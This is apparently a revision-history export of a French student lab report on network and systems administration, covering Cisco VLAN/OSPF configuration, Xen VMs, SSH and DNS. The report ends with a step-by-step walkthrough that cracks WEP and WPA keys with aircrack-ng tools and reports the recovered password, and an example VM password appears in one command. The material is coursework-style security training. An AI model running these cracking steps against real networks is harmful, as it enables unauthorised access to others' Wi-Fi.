       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 86400&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site.      postmaster.anosteke59.site. (&lt;br /&gt;
                         2021112901      ; serial number YYMMDDNN&lt;br /&gt;
                         28800           ; Refresh&lt;br /&gt;
                         7200            ; Retry&lt;br /&gt;
                         864000          ; Expire&lt;br /&gt;
                         86400           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
                 NS      ns.anosteke59.site.&lt;br /&gt;
                 NS      ns6.gandi.net. &lt;br /&gt;
 $ORIGIN anosteke59.site.&lt;br /&gt;
 ns  IN A   193.48.57.182&lt;br /&gt;
 www IN CNAME ns&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
nslookup anosteke59.site &lt;br /&gt;
dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:AD:D9:5F:87:03 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 3 --bssid 44:AD:D9:5F:87:03 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56973</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56973"/>
				<updated>2021-12-13T15:03:43Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 86400&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site.      postmaster.anosteke59.site. (&lt;br /&gt;
                         2021112901      ; serial number YYMMDDNN&lt;br /&gt;
                         28800           ; Refresh&lt;br /&gt;
                         7200            ; Retry&lt;br /&gt;
                         864000          ; Expire&lt;br /&gt;
                         86400           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
                 NS      ns.anosteke59.site.&lt;br /&gt;
                 NS      ns6.gandi.net. &lt;br /&gt;
 $ORIGIN anosteke59.site.&lt;br /&gt;
 ns  IN A   193.48.57.182&lt;br /&gt;
 www IN CNAME ns&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
nslookup anosteke59.site &lt;br /&gt;
dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:AD:D9:5F:87:03 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 3 --bssid 44:AD:D9:5F:87:03 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : ??? On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid ??? -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b ??? dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56971</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56971"/>
				<updated>2021-12-13T15:01:14Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
